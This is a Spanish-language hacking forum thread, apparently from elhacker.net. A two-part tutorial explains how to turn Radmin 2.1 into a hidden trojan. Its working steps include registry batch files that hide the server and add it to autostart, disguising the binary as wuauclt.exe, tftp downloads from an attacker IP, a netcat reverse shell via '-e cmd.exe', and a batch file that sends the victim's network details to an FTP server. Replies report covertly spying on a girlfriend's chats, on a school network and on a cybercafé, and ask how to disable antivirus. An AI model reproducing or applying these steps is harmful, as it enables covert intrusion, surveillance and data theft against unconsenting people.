Troyanizando radmin 2.1
Hola lo mas problable es que muchos ya sepan como hacerlo, pero creo que la informacion nunca esta demas, asi que aqui va.
pues bien, radmin es una herramienta de administracion remota que nos permitira tener:
*Escritorio remoto de nuestra victima
*Espiar escritorio
*Subir y bajar archivos
*Shell remotaYo utilice la versión
2.1 no se si con otras funcione, la web oficial de radmin es www.radmin.com
empecemos ya, voy a poner los pasos enumerados
1.- Nos bajamos el radmin, y lo instalamos en nuestra maquina
2.-Abrimos una shell, para eso nos vamos a inicio---- ejecutar---cmd.exe o cmommand.com segun sea el caso y nos dirigimos al directorio donde instalamos radmin
Citarc:\archivos de programa\radmin\
y ejecutamos r_server.exe /setup
Citarc:\archivos de programa\radmin\r_server.exe /setup
nos aparecera una ventana en la que podremos configurarlo a nuestro gusto.
3.-Escojemos la opcion
Set passwordahora procedemos a introducir nuestro password, deben ser como minimo 8 caracteres, revisen que no este activada la opcion de Enable NT security y le damos en OK
ahora nos dirigimos a la opcion
Optionsen port pongan el que quieran, es el puerto que radmin usara para conectarce, de preferencia usen puertos arriba de 1000 para no levantar sospechas
en trai icon palomeen la opcion Hide trai icon, de esa manera cuando el servidor de radmin se ejecute en la maquina victima no se vera ningun icono
en las demas opciones asegurence de que todo esta desactivado, no quremos dejar logs de ningun tipo, ahora le damos en OK y en Exit.
ya tenemos nuestro radmin bien configurado :) ahora viene lo bueno
voy a explicar dos metodos, uno para instalarlo desde shell remota de usuario y otra para hacer un solo ejecutable que ya tenga nuestro radmin y su configuracion. bueno eso si veo interes en la gente del foro :P
4.- bamos a ir al registro de windows a la siguiente clave:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters
y vamos a fijarnos en las siguientes entradas:
Port aqui esta el puerto que pusimos solo que en hexadecimal
Parameter esta es la contraseña
DisableTrayIcon es la opcion para ocultar el icono
lo que vamos a hacer es copiar los valores de esas tres entradas, porque ahorita las vamos a usar, en mi caso estos fueron los valores
Port b7060000 yo use el puerto 1719
Parameter 3Ab503515d51eb10c3f98c7ab7bc5993
DisableTrayIcon 01000000 este debe estar asi
5.-Ahora nos dirigimos a la carpeta donde tenemos el radmin y le cambiamos el nombre a
r_server.exe por otro menos sospechoso, yo le puse al mio waudt.exe y con la herramienta reshack le cambie el icono, yo le puse el de las actualizaciones automaticas (wuauclt.exe)
6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.
codigo:
CitarREG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
solo sustituyan los valores por los suyos.
7.-Subir archivos via tftp
una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:
Citartftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado
Citartftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre
Citartftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)
ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....
8.- Ejecutar radmin
desde la shell
Citarwuaudt.exe /pass:mipassword /port:tupuerto
yo le puse a mi radmin wuadt.exe pero tu puedes ponerle como quieras, de esta forma ya puedes entrar con el cliente (radmin.exe) a hacer lo que te plasca sin nececidad de reinicar y la proxima ves que se inicie windows, radmin ya estara listo esperando tu conexion
bien aqui termino este tuto espero que les sirva de algo, a mi me a servido bastante y espero que a ustedes tambien
adios... ::)
Tutorial escrito por: OCTALH
Tutorial troyanizando radmin segunda parte...en esta ocacion vamos a hacer de radmin un solo ejecutable, que con solo un doble clic se instale con toda nuestra configuracion ;)
1.- Lo primero que haremos sera bajarnos una herramienta muy util que nos permitira empaquetar todos nuestros archivos. la pueden descargar de esta direccion http://www.ifrance.com/IsAhT/joiner/IPacker%20Tool.zip
2.- una ves que lo bajemos lo descomprimimos y ejecutamos
IPacker Tool.exe ahora nos disponemos a agregar nuestros archivos.
3.- escojemos la opcion
agregar, y despues en
ejecutable eso nos va enviar a un panel donde podemos poner el archivo que queremos agregar, seleccionamos en el icono de la carpeta y escojemos al servidor de radmin, en mi caso se llama wuaudt.exe ya con otro icono para camuflagearlo.
ahora vamos a indicarle donde se debe extraer el archivo, para eso damos click sobre la flecha que apunta a la izquierda y escojemos
%Systemdir%, en mi caso quedo asi: %Systemdir%\wuaudt.exe y le marcamos como archivo del sistema
nota: no escojan la opcion de que se ejecute al extraer, recuerden que si se ejecuta no va servir porque aun no tiene su dll copiada ni sus entradas en el registro. bueno ya que esta todo le damos en
aceptar4.- escojemos la opcion
agregar y en
active x (ocx) extensión de la app. (dll), ahora escojemos la dll de radmin
AdmDll.dll y le indicamos que se copien en
%Systemdir%, seleccionan la opcion registrar y de archivo del sistema, por ultimo
aceptar5.-escojemos la opcion
agregar y en
comandos, haí vamos a cargar la configuracion del radmin, recuerdan el bat que hicimos en la primera parte? bien pues lo vamos a volver a usar, para eso damos clic en el icono del bat y abrimos el bat que habiamos hecho, automaticamente se van a cargargar todas las entradas, y le damos en
aceptar6.-denuevo escojemos la opcion
agregar luego
comando y vamos a agregar la siguiente linea
Citarradmin.exe /pass:xxxxxxxx /port:xxxx
en mi caso queda asi:
Citarwuaudt.exe /pass:xxxxxxxx /port:1719
le damos en
agregar y por ultimo
aceptar7.-pues esto ya casi queda, pero le vamos a agregar una cosa mas,
netcat, si, debido a que radmin es de conexion directa, vamos a tener problemas con la ip ademas si es red, ya sben el cuete de los routers, entonces pasandole el netcat podemos ejecutar una reverse shell, para eso nos vamos a
agregar luego a
ejecutable, en archivo le cargamos el netcat, y le indicamos que se copie a
%Systemdir%, de preferencia ponganle otro nombre menos llamativo, mas de dos si sabran que es nc.exe, yo le puse al mio aviax.exe, seleccionen la opcion
ejecutar tras extraer y
ejecutar oculto, luego seleccionamos la opcion
iniciar en cada inicio, y selecionen donde queren poner la entrada en el registro, yo la puse en HKLM y de nombre le puse aviax, en parametros le ponemos los de la reverse shell
Citar -d -e cmd.exe xxx.xxx.xxx.xxx 1717
, y seleccionamos la opcion de archivo del
sistema, por ultimo aceptar.
8.-ya acabamos ufff, ya solo falta agregarle un ultimo detalle para despistar, nos vamos a
agregar, luego a
mensajes emergentes y le ponemos un mensaje error yo le puse:
Citartitulo : Error
mensaje: Error de lectura aplicación win32 no valida
y
aceptarahora nos dirigimos a
opciones, luego
cargar icono, y le ponemos el icono de un juegito o un programa
haí mismo tienen la opcion de salvar la configuracion, para tener lo que hicimos de respaldo, y si quieren le marcan la casilla para que se borre automaticamente una ves que sea ejecutado, luego
aceptar9.- por ultimo le damos en
generar, y ya tenemos nuestro radmin con su configuracion y ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip www.no-ip.com
10.-ahora solo abren netcat, lo ponen en escucha
-L -p 1717 -vv, le mandan el radmin a la victima, y cuando lo ejecute les dara la shell ya despues abren el cliente de radmin, se conectan a la ip que les de el netcat y a espiar!! y bajarle archivos :)
yo hice un removedor con la misma herramienta solo selecionen que finalice el proceso del radmin y netcat, por si se estan ejecutando y despues que borre los archivos y llaves en el registro. y ya tienen radmin troyanizado, junto con su removedor incluido
saludos y suerte con las pruevas
Tutorial escrito por: OCTALH
Oye, esto es muy interesante!! :) No sólo sigues el mismo camino q utilizamos nosotros para Troyanizar el VNC, sino q tb te has currado lo de instalar el Radmin desde un ejecutable preparado... te ha quedado genial!!
Referencia: Troyanizando VNC - Control Remoto Invisible @ http://foro.elhacker.net/index.php/topic,41671.0.html
Has hecho un buen trabajo, lo he agregado al hilo de Recopilación de Manuales y Textos interesantes.
Muchas gracias, octalh!
Salu2
hola a tod@s, soy un novatillo en el tema de manejarme con windows a nivel de consola, me gustaría saber en el caso de realizar el desinstalador ¿cómo finalizo remote administrator desde consola? ::). He estado mirando el comando taskkill, pero si lo hago de forma automática no sabría el PID del proceso ¿verdad?. Salu2. :P
Esta muy bueno, tu manual "octalh", felicidades!!!!!!!!
Lo he probado en la red de mi escuela y funciona a la perfección... ;D
solo tengo un pequeño problema, que si lo dejo que se active a una determinada hora, y la victima tiene Norton Antivirus, cuando se ejecuta el "r_server.exe", el norton le avisa que hay un programa tratando de comunicarse con él... :'(
alguien sabe si existe alguna manera de desactivar el norton. y que no le aparezca la ventana de notificacion???
Pues yo hace tiempo que tenia norton y recuerdo que en las opciones habia una opcion para agragar carpetas o archivos que no quisieras que norton tocara, yo lo hacia para excluir a mis herramientas porque algunas me las borraba, revisa eso y si es asi, le indicas a norton que se brinque el radmin, despues exportas la llave del registro donde se guardan las carpetas y archivos que exluyes y se la importas a la victima
Creo que no me explique bien.... :'(
Lo que me pasa es que, cuando se ejecuta el "r_server.exe" en la victima (claro con otro nombre) y como la victima tiene Norton Antivirus 2004 junto con su Firewal (Norton Firewall Security), le aparece una ventana en la cual puede decidir si se ejecutará o no, el servidor "r_server.exe" de Radmin; ademas le aparece mi direccion IP y el archivo que estoy tratando de ejecutar, asi como el puerto que estoy usando...
El firewall de windoze XP SP2 no da aviso alguno...!!!!!!! eso es genial ;D
Existe alguna manera de desactivar el firewall de norton para que me deje conectarme con su máquina...
espero haberme explicado :) y gracias por la respuesta "octalh"
Hola, quería volver a insistir con el tema de cómo finalizar la ejecución del servicio de Remote Administrator y el programa Netcat cuando vayamos a realizar el desinstalador ???. Thanks.
Cita de: xpinete en 26 Febrero 2005, 22:03 PM
Hola, quería volver a insistir con el tema de cómo finalizar la ejecución del servicio de Remote Administrator y el programa Netcat cuando vayamos a realizar el desinstalador ???. Thanks.
Usa el comando 'tasklist' y entonces sabras el PID, y luego el taskkill
Suerte,
Ertai
Si hago el desinstalador con IPacker Tool no podré detener el programa de forma automática ¿verdad?, porque necesitaría saber el PID para poder meter el comando taskkill dentro del paquete desinstalador :(. Thanks.
No puse el procedimiento porque creo que es muy simple solo hay que seguir la misma logica de la forma en la que se troyanizo, creas un bat que borre todas las entradas en el registro y todos los archivos, el ipakertool, ya tiene una opcion para detener el proceso, de esa manera pones esa instruccion hasta el principio, porque si no, no vas a poder borar el radmin ya que se estaria ejecutando
bat:
CitarREG DELETE HKEY_LOCAL_MACHINE\System\RAdmin /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v radmin /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v netcat /f
del /a:s c:\windows\system32\radmin.exe
del /a:s c:\windows\system32\AdmDll.dll
del /a:s c:\windows\system32\nc.exe
recuerda antes de meter las instrucciones del bat en el ipackertool, primero indicale que finalice el proceso del radmin.
saludos....
Gracias por la respuesta octalh, ya tengo desinstalador hecho y funcionando correctamente. Una última cosita...no probeis con la versión de Remote Administrator 2.2 porque es diferente y no funcionaría. Supongo que con algunas modificaciones valdría. Saludos. ::)
Soy nuevito en esto, no entiendo esta parte...... :o
ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip www.no-ip.com
Que es la reverse shell? y lo de la redireccion.
Gracias a quien me pueda ayudar..... 8)
busca un poco antes de preguntar.
shell reverse --> shell inversa.
En vez de tu conectarse a el, que el se conecte a ti, por eso se llama inverso (lo normal es al revés). Busca antes de preguntar y haz el favor de leer.
Esta muy bien ese programa,yo use uno y lo istale en el ciber y tengo control sobre el ciber. ;D
Tengo un serio problema, como oculto "Remote Administrator Service" del services.msc del pc al q me conecto?¿? ??? Canta un poco para cualkiera q sepa pra q sirve ;D ::)
EN la vesion 2.2 no aparece lasopciones k tu hay en el tutorial ??????? l a verdad k se tiene k resetear o no ????y si lamakina tiene deep frezeer k hago lekito el deep ?'?? :-\ :-\ :-\ :-\ :-\ :-\
HOLA COMPADRE... YO AUN SOY UN NOVATO :P PERO APRENDO MUY RAPIDO... SEGUI TUS INDICACIONES PASO A PASO... LLEGUE AL PUNTO DE ENTRAR EN LA SHELL... TENGO CASI TODO PERO NO PUEDO ENTRAR... ME CONECTO A LA IP QUE ME DEVUELVE (QUE EN TODO CASO POR OTRO LADO ME LA PUEDO CONSEGUIR... ES LA MISMA...) VEO SUS PROGRAMAS CARPETAS, ARCHIVOS.... TIENE EL R_SERVER ANDANDO PERO NO LOGRO CONECTARME ???
SUPONGO... MMM TENGO ESTOS PUERTOS EN UN ENREDO:
1717
1719 Y EL PUERTO QUE SALE CON LA IP ERA 1277 ???
ME SALE ASI:
C:\>nc.exe
Cmd Line: -L -p 1717 -vv
listening on [any] 1717...
conecct to [ip.atacante] from pc-xxx-xx-xxx-xxx.cm.vtr.net [ip.victima] 1277
Microft Windows todo el resto...
C:\Document and Settings\"Nombre de la cuenta"\Mis documentos\Mis archivos recibidos
LE PONGO LA IP DE LA VICTIMA Y NO PASA NA... PROBE CON TODOS LOS PUERTOS QUE MENCIONE Y NO SE QUE HACER...
PODRIAS SER TAN GENIAL DE EXPLICARME LOS PASOS QUE SON OBVIOS PARA TI... PERO INEXPLICABLES PARA MI? ???
Si has segudo los pasos exactamente igual que el ejemplo el puerto al que debes conectar es el 1719. Pero quizas lo que haya podido pasar es que no se haya ejecutado realmente el r_server.exe en la victima. Hay una errata en el fuchero .bat de octalh: en la ultima linea
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe
fijate donde pone wuauclt en realidad debe de poner wuaudt.
Gracias... me di cuenta pero yo pense... que de donde saco el icono para camuflarlo tenia que ponerle asi... al final entre al pc de la victima... que me fue muy util... (estoy espiando a mi polola... sus conversaciones de chat me han dicho todo....) pero ahora quiero instalarle un "key recorder" pero si se lo tiro al inicio ella lo vera... en eso estoy... TENGO UN GRAVE PROBLEMA... CUANDO PARTE SU conexión Y ESPERO LA SHELL REVERSE: -L -P 1717 -VV... NO PASA NADA... TUBE QUE DECIRLE QUE EJECUTARA EL TROYANO DE NUEVO PARA ENTRAR... ¿SI LE CAMBIO ESA NOTA ERRADA AL BAT... FUNCIONARA CADA VEZ QUE PARA EL PCSIN TENER QUE EJECUTAR EL TROYANO?
GRACIAS POR RESPONDER... THANKS MASTERS OF COMPUTERS
bueno el motivo por el cual le puse wuaudt.exe es porque hay un archivo en la carpeta system32 que se llama wuauclt.exe, ese se encarga de las actualizaciones automaticas del windows, lo hice para hacerlo pasar desapersibido, para un usuario comun lo mas probable es que ni fw tenga pero para alguien que ya sabe un poco mas, ya sabra para que es wuauclt.exe y si su fw de da alarma alomejor y no se fije bien en el nombre y lo deje pasar, por eso hasta le puse el icono del original, veras el metodo de la reverse shell con netcat solo era para que puedas activarlo en el momento y no tengas que esperar a que la victima reinicie, lo que tambien puedes hacer es ponerle un notificador de ip al radmin, de esa forma si la victima tiene ip dinamica estaras al tanto de su nueva ip, te pongo el codigo abajo, este codigo fue sacado del foro, pero lo modifique un poco
@echo off
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v wuauclt /t REG_SZ /d "C:\windows\system32\systrai.bat" /f
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo usuario >C:\WINDOWS\system32\Win32el.dll
echo contraseña >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp
exit
recuerda que el bat se debe llamar systrai.bat y lo debes colocar en la carpeta system32
bueno lo quite unos cuantos comandos, porque si tu quieres le puedes poner mas par conocer mas del sistema, el motivo fue porque este bat se ejecuta todos los dias con el inicio del sistema y por supesto de forma oculta, pero mientras el bat este subiendo los datos al servidor, a la victima no se le va aparecer el escritorio, y eso le va parecer sospechoso fue por eso que le quite comandos, asi sube la info a tu servidor en unos cuanros segundos y sin problemas ni sospechas
salud2..
Hola Octalh... gracias por responder... bueno... tratare de probar ese bat... a ver como funciona... pero un consejo al momento de que cualquier antivirus, vacuna, o antispyware avise podriamos transformar el archivo exe. (troyano) en un archivo zip autoejecutable... poniendole sus mismos iconos, etc... yo le puse en selecionar comandos: "cualquier tipo de archivo", asi le mande un video chistoso a un amigo... y lo que ve el es que se descomprime y luego ve el video, mientras que se ejecutan todos los bat sin que se de cuenta... con algun mensaje para despirtar, porsupuesto, Windows Media Player: Tu archivo ha sido descargado con exito.
pero para una persona que proteja su computador a diario... el archivo que tranformemos podriamos disfrasarlo como una actualizacion del mismo Windows Media Player... asi al momento de que aviso de que aviax.exe esta intentando connectarse a internet o el mismo r_server... el mensaje dira que aviax o cualquier nombre es la actualizacion del mismo y que no se puede ver el video sin esta actualizacion... luego que acepte... le mandamos otro mensaje que diga que se actualizo... es solo una idea al momento de que funcionen todas las defensas... por que no dira que es un virus... sino que hay programas que intentan conectarse a la net...
pero igual me gustaria saber cual podria ser el bat que se pase por alto el famoso "AnitiSpyWare" pues es él quien me delató. y otra cosa muy interesante... busqué... con el programa para cambiar los iconos, ResHack... ejecute el winzip: c:\archivo de programa\winzip32 ... y encontre un icono transparente... muy util al momento de camuflar el servidor... asi... si se llegara a ver en la barra de tareas... solo se veria un espacio ;D... ok...
Y por ultimo te recuerdo octalh que solo soy un novato... y quede plop :o ;D :-X al momento de intentar ingresar mis datos en el ultimo bat que mandaste... :-X si eres tan amable de dar un ejemplo de como podria quedar con datos... aprueba de jiles que preguntan tonteras... ya? :P
saludos y gracias...!!!
mira el ultimo bat es un notificador de ip, por aquello de las ip dinamicas, lo que hace es enviarte a un servidor ftp la nueva ip de la victima, para que te puedas conectar con radmin, puedes crearte una cuenta en lycos, iespana, miarroba...etc y usar el servidor ftp que te den
salu2...
mira... si el problema no es saber la ip... por que la saco del comando netstat -na cuando estoy en msn o mandando archivos a la vistima... si el problema es que los bat te delatan... me entiendes...
dime una cosa... una vez que tengo el servidor instalado en el pc de la victima... el dll... y todo lo que instala... yo sabiendo la ip (que es dinamica)... me conecto con esa ip... y el puerto 1719 deberia funcionar...
¿que pongo aqui?
echo configuracion del sistema de la victima (en esta no entiendo)
echo usuario > ( en esta me imagino que el nick de usuario que hice)
echo contraseña >(¿es la contraseña del nick?)
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp (y aqui no cacho... en vez de poner servidor pongo algun numero, una direccion o que..)
exit
y con respecto a otra cosa... solo por cultura informatica... si tenemos acceso a este tipo de derechos... podemos poner que se conecte la webcam o eso es otra cosa... lei por ahi que a alguien lo detenieron por habilitar una webcam de otra persona... creo que fue en argentina... pero no me imagino como se pueda hacer eso...
saludos...!!!! ;D
hola me acabo de reguistrar y es el prmer mensaje que pongo soy nuevo en esto no se si la pregunta q les vy hacer sera muy evidente pero prfavor ayudarme les esplico le e metido a la victima el servidor recibo la sel miro la ip luego le ejecuto el servidor pero no me va asi q le desactivo el firewall de windows pero no consigo desactivar la proteccion de automatica de panda ni matar los procesos de panda me podriais decir como hacerlo? creo que todo esta bien porque lo e probado con migo y funciona gracias por adelantado ;D
leete este post aqui se explica como desactivar el fw del sp2, solo tienes que agregarle esa opcion al bat antes de que se ejecute todo lo demas
http://foro.elhacker.net/index.php/topic,63362.0.html
Salu2
eso ya lo lei el problema que yo tengo es con el fw de panda`porque de esa manera no me deja con el panda alguin save hacer eso pero con el panda? gracias de todos modos
usa un mata procesos
Hola
si alguien me puede ayudar por favor.
soy muy novato, he echo todo paso a paso segun el manual , y elegido la opicon de ejecutable para poderselo enviar a la victima.
aun haciendo todos los pasos tal y como dice el manual no me ha funcionado. el nc se abre y puedo ver sin problema , el pc de la victima desde el cmd pero el radmin no funciona.
pero aun asi tengo algunas dudas que supongo que seran las que hacen que no funcione
1. agregar ejecutable cuando dices "elegir archivo de sistema" hace referencia a que en el IPacker Tool hay que elegir las pestañas "archivo" y la pestaña "sistema" la misma duda se aplicaria para el punto 4º (dll) y para el 7º (nc)
2 el el punto 4º al agregar la dll el IPacker Tool me muestra comandos (0) tiene que quedar asi?.
Bueno si alguien pudiese ayudarme con estas dudas. le estaria muy agradecido
gracias adelantadas
salu2 ;D
Nas, soy nuevo en el foro, estoy intentado hacer el tutorial, pero me pierdo en lo de hacer el bat.
Meto toda la linea de codigo en el cmd pero al final no se que es realmente lo que se crea, se supone que es un archivo .bat? O es un .exe?
La linea en cuestion es esta:
Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
En la carpeta radmin de archivos de programa tengo puesto el fichero wuaudt.exe
a ver si me pueden ayudar plz
que onda... Mira, haber si te puedo ayudar, yo tmb batalle en eso, eske no se mucho de programacion basika Jajajaja...
El Bat lo haces en el Note Pad, pero le pones de nombre por ejemplo "radmin.bat" o "hola.bat", pero que termine en BAT, pke sino se creara un simple archivo de texto.
despues...
Escribes todo el codigo, pero recuerda que tienes que cambiar el parametro de la contraseña... mira, observa el codigo
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "aki va el codigo que representa el puerto que kieras"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "aki va la contraseña que hayas escogido"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
... Este lo guardas en cualkier karpeta de tu pc, y a la hora de que estes agregando el comando de consola escoges el archivo que kreaste (EL BAT)... Y pues lo demas creo que si sabes como hacerlo vdd?
Como kiera... Si tienes alguna duda aki tienes mi mail
Xtreme_Modding@Hotmail.com
Espero haberte ayudado :)
mira pana yo instale el programa pero yegue hasta la parte de citar:
reg add HKEY_LOCAL_MACHINE........ DIME QUE ES ESO?
[/font]
soy super novato
hola ocldth te felicito por tu archivo pero tengo un problema y es ¿como subo eso via tftp?
Hola octalh colega, soy novoto en esto y quiero poder mandarte un manual para que tu lo revises y si estas deacuerdo me lo confirmes, te ruego me digas tu e-mail para hacertelo llegar.
Yo he seguido todos estos pasos y no consigo troyanizar el radmin.
Te ruego me digas en que fallo y sobre todo si no fallo en nada decirme si con este manual puedo acceder a IP's especificas dentro de una red local desde donde yo este y con IP dinamica.
Un saludo.
Eres cojonudo.
Aun llegando tarde aeste post comento mis preguntas,
osea el si diesese la casualidad de que el netcat intenta conectar antes de que el user inicie la conexion a internet entonces ¿que pasaria? se enviaria? netcat seguiria intentandolo? etc
La otra es que puse como mi ip un dominio no-ip, aun no he hecho pruebas, pero pregunto ya si funcionaria con el netcat.
Y eso es todo, ante todo felicitar a octalh por este tutorial
Ante todo muchas felicitaciones a octalh por este tutorial es bueno reconocer lo que eres y como decimos en mi pais ( eres el webo que aletea en la noche ) en fin he leido toda esta parte de troyanizar el radmin y al parecer grax a tu tutorial se ve facil ... claro no entiendo eso de subir archivos por tftp pero lo de hacer un ejecutable kon todo me parece mejor el problem es que el link para bajarce el ipacker 20tool esta roto o nose que si me lo puedes mandar a mi correo o alguien me lo pueda mandar eso si sin regalitos extras ... se lo agradeceria un monton mi correo es conoelamadre@hotmail.com grax
Hola Bueno soy yo otra vez ya hice todo lo que decia octalh y y me he leido todas las comversaciones de esta parte de troyaniar el radmin se veia facil pero.... me esta costando demasiado ya llevo 4 dias durmiendo solo 3 horas y solo pensando en que fallo ... en fin mi falla es en la que komenta el usuario 1000101 a la final logro konectar kon la victima por netcat o msdos pero no logro conectarme por el radmin la cuestion es que conectarme con una victima kon ip directa no es lo que me interesa si no lo de conectarme a un ciber ... mi esposa trabaja en un ciber y lo hemos estando intentando de mil maneras por los 9829852895 puertos existentes y no hay manera de conectarme por el radmin solo konecta por el netcat ... todo lo he hecho textualmente pero nada de nada por favor ayudenme diganme cual es mi fallo solo quiero konectarme a un par de ciber ... en el caso de donde trabaja mi esposa solo logro konectarme por netcat pero si logra conectar por el netcat dentro de un ciber me imagino que tambien deberia conectar por el radmin de verdad a los usuarios ados y chemo y al usuario 1000101 si logro porfavor ayudenme ... a la final creo que mi error es el mismo que tiene el usurario cazandomoscas por favor mandeme su telefono o un correo o que se yo ... yo los llamo pa que me expliken mejor o para aclarar ciertas dudas por telefono de verdad me interesa mucho poder hacerlo y gracias de ante mano
Alguien podria decirme como configurar el tftpd32 para subir via tftp?
Solamente me falta eso...
muchas gracias
hola. excelente el proceso, pero tengo una duda. como hago para modificar los registros en qin98? ya que con el .bat no pude. gracias.
ya he conseguido hacer el archivo...
pero lo he mandado a un amigo como prueba... este lo ha abierto y yo he abierto el netcat he puesto -L -p 1717 -vv
Me dice
listening on (any) 7171 y no pasa de esto...
que puedo tener mal
Gracias
hola gusto de saludarlos yo he probado el radmin pero mi consulta es la siguiente es posible hacer eso con vnc??? ;D
Wenas!!!!! soy nuevo en este foro desde hace poco, i no me despego de el proque es muy interesante, i me gusta aprender i investigar, e estado haciendo cosas pero nunca las acabo porque me quedo atascado en 1 parte. Aora bien estoy mi pregunta es:
port 23 13 00 00
parameter **********
DisableTrayIcon:01000000
eso son mis parametros, donde pone port k puerto pongo? ese o cual. Solo quiero aprender y gracias a vosotros estoy aprendiendo.GRACIAS!!!!
estuve AVERIGUANDO Y SIMPLEMENTE HABIA que KREAR UN ARCHIVILLO CON LA EXTENSION .REG. HE AKI LA SINTAXIS, CREALO EN BLOCK DE NOTAS Y SALVARLO COMO .REG
REGEDIT4
[HKEY_LOCAL_MACHINE\System\RAdmin]
[HKEY_LOCAL_MACHINE\System\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:2c,b8,76,01,32,90,88,2c,6e,63,e4,f4,b8,9d,c5,7e
"Port"=hex:23,13,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"WindowsUpdateManager"="C:\\WINDOWS\\SYSTEM\\wualuld.exe /service"
EN PARAMETER que ES LA KONTRASEÑA LE PUSE ADMINISTRADOR. Y EN EL NOMBRE DE R_SERVER.EXE LE PUSE WUALULD.EXE, Y PARA QUE EN EL REGISTRO DE GUINDOUS NO APAREZKA NADA SOSPECHOSO, LE PUSE DE NOMBRE AL SERVICIO "wINDOWSuPDATEmANAGER"
ENTONCES EN VEZ DEL BAT, EJECUTAMOS EL REG.
Hola amigos, he estado mirando y estudiando el tema de radmin, lo he hecho y funciono a la perfeccion, bueno el tema esta en que el cliente tiene que estar si o si en la misma prestadora de internet, porque he intentado acceder desde un cyber y no he podido , hay alguna forma de acceder de un cyber o simplemente tiene que ser la misma prestadora de internet, les agradeceria su respuesta gracias!
no entiendo.... a que te refieres con prestadora de internet..... ???
Hola, disculpa mi mala expresion, es asi el tema tengo internet por aire (wireless), la prestadora de internet es LANTEL de telefonica, la cosa es asi, tengo una maquina tambien conectada a lantel pero en otro sitio de la ciudad, le he instalado el radmin y funciona perfectamente cuando entro por mi computadora (osea estoy siempre con lantel no con otra prestadora), bueno me voy a un locutorio ( prestadora de internet por ejemplo ADSL de telecom o telefonica (cyber) y no me anda el radmin por que es?, hay alguna forma de hacerlo funcionar de un cyber , gracias espero haber sido mas especifico, saludos
Bueno lla e escrito unas tres veces en este mismo sitio cada vez una pregunta diferente de las otras porqeu com mas tiempop e estado probando averiguaba lo qeu habia preguntado pero ahora tenog la ultima pregunta de lo ultimo en la creacion del radmin con netcan bueno es que mirad todo va bien cuando lo ejecuta en su pc me devuelve la shell pero al reiniciar solo va bien si le pongo no ocultar al netcat cuando lo hago con el iphackertool y entonces si le pongo no ocultar me sale al iniciar en la victima pero el le tiene que dar enter para que devuelva la shell porque si le pongo oulto no me devuelve nada si a alguien sabe porqeu o si es que me pasa algo decidmelo. gracias
